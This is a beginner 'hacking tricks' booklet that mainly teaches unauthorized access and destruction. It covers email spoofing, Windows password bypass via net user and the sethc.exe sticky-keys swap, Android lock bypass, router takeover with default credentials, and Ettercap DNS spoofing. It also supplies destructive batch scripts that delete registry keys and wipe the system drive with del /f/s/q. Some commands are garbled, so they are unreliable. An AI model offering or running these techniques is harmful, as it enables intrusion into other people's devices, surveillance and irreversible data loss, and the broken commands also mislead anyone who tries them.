Вы находитесь на странице: 1из 42

RAJ TYAGI'S

H A C K I N G T U T O R I A L S

The Best
Hacking
Tricks For
Beginners
DEDICATED TO:-

MY PARENTS

MY GRANDPARENTS

MY SISTERS

AND TO MY FRIENDS
The Best Hacking Tricks For
Beginners, Level-1

Price: 75/-

First Edition: December 17

“This book or part thereof may not be


reproduced
By any person or agency in any
manner.”
Disclaimer
Any actions and or activities related to the material
contained within this Book are solely your
responsibility. The misuse of the information in this
Book can result in criminal charges brought against
the persons in question. The authors and Publishers
will not be held responsible in the event any criminal
charges be brought against any individuals misusing
the information in this Book to break the law.

This Book contains materials that can be potentially


damaging or dangerous. If you do not fully
understand something on this Book, then STOP
READING IT! Refer to the laws in your
province/country before accessing, using, or in any
other way utilizing these materials. These materials
are for educational and research purposes only. Do
not attempt to violate the law with anything contained
here. If this is your intention, then LEAVE NOW!
Neither the authors of this material, or anyone else
affiliated in any way, is going to accept responsibility
for your actions. Neither the creator nor the book is
responsible for the tricks posted on this book.
Acknowledgements
AUTHOR

• RAJ TYAGI, Ethical hacker, Businessman,


Chairman, Learn2Do

EDITING & COORDINATION


•RAJ TYAGI
Sl. No. Name of Unit

Unit 1 Fake Email (Tutorial)

Unit 2 Password Crack (for PC)

Unit 3 Hiding an file (Tutorial)

Unit 4 Google Hacks (Tutorial)

Unit 5 Mobile phone hacking (Android)

Unit 6 Mobile as a webcam (Tutorial)

Unit 7 Hack a home router (Tutorial)

Unit 8 How to do DNS poisoning (Tutorial)

Unit 9 How to destroy a PC (Dangerous)

Unit 10 How to create a virus (Tutorial)


 So before getting started let me tell
you that I will be teaching this
tutorial to you as a friend and will
be using some frank words so
please don’t mind them.

So there are actually 2 ways to send a


fake email:-

1- Using some anonymous website.

2- Using PHP.
Now let me tell you the name of some
famous and trusted anonymous fake
email sending website and they are:-

1- Mail Anonymizer.name (send


attachments also)

2- FakeEmailer.net

3- FakeEmailer.info

4- Deadfake.com

Now comes the second way, which is


using the PHP software. So here is an
example of the PHP script:-
<? php

$to = ‘nobody@example.com’;

$subject = ‘the subject’;

$message = ‘hello’;

$headers = ‘from: nobody@example.com’

. “\r\n”.

‘Reply-To: nobody@example.com’.”\r\n”.

‘X-Mailer: PHP/’ .phpversion ();

Mail ($to, $subject, $message,


$headers);?>

So guys by using these 2 methods you


can easily send anyone a fake email
and can even prank on your friends. 
Now comes how you can find the
address and the location of the sender
of the email 

1- First of all open the email and click


on the 3 dots and then click on the
show original option as shown in the
image.
2- After clicking on that option a new
tab will be opened.( something bullshit
like this)

3- Now what you have to do is just


simply find their IP address in this. (I
know now you are feeling very angry
on me but this is what u has to do)
4- After finding the IP address just
copy it and open a new tab and search
for www.ip2location.com (or just
simply type ip2location in Google)

5- You will see a website get opened


just click on the demo option and
paste your IP address in the search
box, as shown in the image.
6- Hit the search button and you will
get all the information about the
sender, like this
Note: - Once the passwords got
converted into hashes (hexa decimal
format), we cannot convert them back
to clear text).

So guy’s passwords may be cracked


manually or with automated tools
such as brute-force method or rainbow
table attack.

Now you guys are thinking that this


can be only done by the professional
hackers but wait a minute dude I am
goanna tell you 3 best and easiest
method other than these given above
to hack a pc password and use the pc.

First Method
1- The first method is done by using
the command prompt.

2- Simply search for command prompt


in the window tab.
3- Just simply click on it and open it.

4- After it get opened just type the


following command in it.

Net user username*

5- After typing the command just hit


the enter button and you will see the
command got accepted
6- After that just type the new
password you want and press enter.

7- Leave blank and hit enter button to


remove the password.

Hmmm!!! Now the password is reset


and now you can use your friends or
anyone’s pc without knowing the
password.

Second method

1- Go to c:\windows\system32

2- Copy the file cmd.exe to desktop


and rename it to sethc.exe
3- Copy the file sethc.exe to
c:\windows\system32\ and it will give
you an error, give that error yes, and
replace it.

4- Now at the login screen press


SHIFT KEY 5 times and a beep sound
will come and command prompt will
get open.

5- In the command prompt simply type


“explore.exe” and hit the ENTER. A
desktop will open in a tab mode. Use
the pc.
Guys if you can’t access the suspects pc
like if he/she does not gives you it opened
or logged in than simply do the second
method from step 4 and then repeat the
first method in the tab mode desktop.
In this unit you are going to learn:-

1- How to hide a file in an image

So now comes the main topic which is


about how to hide a file in an image
(simply follow the steps and you are
done).

1- Select an image to be used for


hiding file behind the image.

2- Now select the file to hide behind


the image and make it in .RAR format,
using WinRAR.
3- Paste both the files on desktop and
type the following command in
command prompt

[Cd desktop]

[Copy/ b imagename.jpg +
filename.rar finalnameofimage.jpg]

4- Than finally hit enter.

That’s it your file will get hidden


behind the image.
So now comes the interested part of the book
which is about some famous Google hacks.

So before telling any other shit just scroll down


and let’s have a look.

There are total 5 Google hacks according to


me (last 2 of them are actually websites those
are extremely great and many few people
know about them).

Make sure to type these commands same as


given here in Google search bar.
1- (intitle:hacking)

2- (Filetype:doc intitled:“hacking”)

3- (inurl: indexframe.shtml)

4- www.hidemyass.com

5- https://securityxploaded.com
In this unit we are going to learn that
how you can simply hack the
password of any android mobile
phone, just follow the given steps and
you are done.
1- Suppose this is your android mobile
phone.

2- Now see the image given below and


follow the instructions.
3- After doing this you phone will get
power off and after a couple of
seconds you will see something like
this.
4- Now what you have to do is press
your volume down button 4 times and
you will be able to see something like
this.

5- After that just press the power


button and then press volume down
button for 4 times.

6- press the power button and that’s


it, wait for a couple of minutes and
you will find your phone unlocked
1- Now comes the second method
which is slightly same as the method
1. So what you have to do is follow
method one till step 2.

2- Now what you have to do is press


your volume down button 5 times and
you will be able to see something like
this.
3- Now just power button and that’s it.
Wait for a couple of minutes and your
phone will get unlocked.

1- If the above given methods doesn’t


work then download “iskysoft-toolbox”

By using this software you can easily


unlock your mobile phone ( both
android and ios).

2- You will need a data cable and


laptop or pc for this.

3- Download link-
https://toolbox.iskysoft.com
So guys in this unit you are going to
learn that how you can turn your
mobile phone into a webcam, so let’s
begin the topic.

For this you will need a pc or a laptop,


a good internet connection and a
mobile phone.

1- First of all connect your pc/laptop


and the mobile phone to the same Wi-
Fi network.
2- Install the IP webcam app on your
mobile phone, it will look like this.

3- Close all other camera apps. Force


close them from the app switcher
before you proceed.
4- Launch the app. scroll to the
bottom and tap start server.

5- The app will now fire up your


phone’s camera and display a URL.

6- Enter the URL in any browser on


your computer and hit enter.

7- In browser, you will see a drop


down menu next to video renderer.

8- Below that you will see audio


renderer, select HTML wav (to hear
the audio you can use this step).

So now you can put your phone


anywhere you want and can monitor
the activities.
Requirements:-

1- Port scanner (you can use nmap


because it’s free).

2- Web browser (I prefer Google


chrome but you can choose any one).

3- Internet.

1- We should select an IP range (using


nmap).

2- Now let’s scan for home routers.


When you finished your scan, you can
find IP addresses, which has open
ports such as http port (80), ftp port
(21) and telnet port (23)

(Use 80 port)

3- Now we can access these


addresses using our web browser.
http port is opened and we need to
find whether the web page is router
log in page.

4- If you see the alert error messages,


it says TD-8817. So we can google for
it.
Search ‘TD-8817 default username and
password’

5- Now, let’s try to access these IP


addresses using default login we got
on step 4.

Default username and passwords are


not same for every router.

With username: admin and password:


admin, we can log in to the router
administration page and you can
easily connect to the Wi-Fi after
getting logged in.
So guys before getting started let me
tell you what is DNS poisoning are. It
means that whenever anyone click’s
on a url like if one clicks on the url of
Facebook or he/she wants to go to
Facebook but eventually he/she got
redirected to another website.

Requirements:-

1- Ettercap (you can easily find it on


Google)

2- Internet connection.

3- A pc or a Laptop (you can also use


your mobile phone)
1- Open up the terminal and type
“nanoetter.dns” (using Ettercap).

(This file contains all entries for DNS


addresses which is used by Ettercap
to resolve the domain name addresses
.n)

The best file, which you can create,


is Facebook. So we will add a fake
entry of “facebook.n” if someone
wants to open Facebook, he/she will
be redirected to another website.
2- Now insert the entries under the
words “redirect it to www.linux.org”
(you can add another site also)

3- Now save this file and exit by


saving the file. Use “ctrl+x” to save
the file.

4- start ARP poisoning, after that click


on “plugins” in the menu bar and
select “dns_spoof” plugin.

5- It’s done. (Now whenever anyone


wants to open Facebook it the
browser he/she will be redirected to
the selected site).
So before getting start let me tell you
that this is very dangerous. This will
delete key registry files, and then
loops a message (CANNOT BE
RECOVERED FROM).

1- Type the following code in notepad


(you can change the name echo by the
real administrative name of the pc you
want to destroy).
@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

: MESSAGE

Echo your computer has been


fucked, Have a nice day.

GOTO MESSAGE

2- Save it as (reg.vbs) and run it.

3- Than sweetly say goodbye to the pc



So basically it is a notepad virus
which delete’s all the content of a
drive.

1- Just type the following command in


notepad (you can change the echo)

@echo off

del %systemdrive%\*.*/f/s/q
shutdown-r-f-t 00

2- Save the above code in a .bat file.

That’s it you are done.


So now let me give a free tutorial on
how to disable internet permanently
on a pc.

I know now some boys are feeling like


holy moly 

1- Type the following command in


notepad (you can change echo)

Echo @echo off > c:


windowswimn32.batEcho
break off>

2- Save it as A .bat file

And you’re done now the person who


owns the pc/laptop can’t access to
internet in his whole life.
Thanks For reading this book and I
hope the contents described in this
book will help you to learn
something about hacking and you
will gain some knowledge from this
book.
And at last I want to say something
very very important said by me :-P

“Stop trying to fit in when you are


born to stand out”

- RAJ TYAGI

Вам также может понравиться